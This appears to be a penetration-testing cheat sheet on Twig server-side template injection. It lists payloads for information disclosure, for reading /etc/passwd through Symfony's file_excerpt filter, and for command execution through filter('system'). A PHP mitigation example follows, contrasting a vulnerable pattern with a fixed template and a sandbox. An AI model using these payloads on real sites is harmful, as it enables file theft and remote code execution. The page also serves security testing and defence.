TWIG (EXPLOITATION)

Twig is a template engine for the PHP programming language.

INFORMATION DISCLOSURE

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ _self }}
 * The _self keyword returns a small amount of information about the current template. The amount of information is limited compared to Jinja.

LFI

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ "/etc/passwd"|file_excerpt(1,-1) }}

 * Reading local files is not possible using the internal functions that Twig itself provides.
    - However, the PHP web framework Symfony (https://symfony.com/) defines additional Twig filters, such as file_excerpt, which can be used to read local files.

RCE

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ ['id'] | filter('system') }}
 * The PHP built-in function "system" must be used to achieve RCE.
    - You can pass an argument to this function by using Twig's "filter" function.
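
MITIGATION (ADDED EXAMPLE)

 * The probes above only evaluate when user input is compiled as template source. The PHP below is an added example, not code from the original page: it puts that weak pattern beside a fixed template and a sandboxed environment. It assumes twig/twig 3.x installed via Composer; the function names, the "greeting" template and the allowlist are hypothetical.

```php
<?php
// Added example (not from the original page). Assumes twig/twig 3.x via Composer.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// Constructed sample input: the RCE probe from this page, as a form field would deliver it.
$probe = "{{ ['id'] | filter('system') }}";

// Weak: user input is concatenated into template SOURCE, so Twig evaluates it.
// Shown for contrast only; it is never called below.
function renderWeak(Environment $twig, string $input): string
{
    return $twig->createTemplate('Hello ' . $input)->render();
}

// Corrected: the template is fixed; user input is only a variable value,
// printed through the default HTML autoescaping and never parsed as Twig.
function renderSafe(Environment $twig, string $input): string
{
    return $twig->render('greeting', ['name' => $input]);
}

// If users must author templates, enable the sandbox with an explicit allowlist.
// "filter" is not on this (assumed) list, so the probe is rejected.
function renderSandboxed(string $source): string
{
    $twig = new Environment(new ArrayLoader());
    $policy = new SecurityPolicy(['if'], ['escape', 'upper'], [], [], []);
    $twig->addExtension(new SandboxExtension($policy, true)); // true = sandbox every template
    try {
        return $twig->createTemplate($source)->render();
    } catch (SecurityError $e) {
        return 'blocked: ' . $e->getMessage();
    }
}

$twig = new Environment(new ArrayLoader(['greeting' => 'Hello {{ name }}']));
echo renderSafe($twig, $probe), PHP_EOL;   // the probe is output as inert, escaped text
echo renderSandboxed($probe), PHP_EOL;     // the sandbox refuses the "filter" filter
```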
